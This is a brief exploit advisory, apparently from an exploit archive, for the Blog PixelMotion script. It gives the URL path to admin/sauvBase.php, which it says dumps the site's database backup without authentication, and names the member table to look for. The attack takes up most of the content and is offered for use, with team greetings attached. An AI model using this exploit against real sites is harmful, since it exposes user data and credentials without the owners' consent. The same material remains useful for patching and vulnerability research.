id: 2827
date: 04/05/2008
title: Blog PixelMotion (sauvBase.php) Arbitrary Database Backup Vulnerability
author: JiKo
cves: 

=======================================================================
Blog PixelMotion (sauvBase.php) Arbitrary Database Backup Vulnerability
=======================================================================



-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko [jiki team]
# Script  : Blog PixelMotion 
# Bug   : Database Backup Dump Vulnerability
# Download  : http://www.pixelmotion.org/zip/blog.zip
 
=========================JIkI Team===================
# Exploit  :
 
  http://[Site]/[script]/admin/sauvBase.php
table of member is blog_utilisateurs
=========================JIKI Team===================
 greetz : all my friend and H-T Team 




#  0day.today [2023-03-23]  #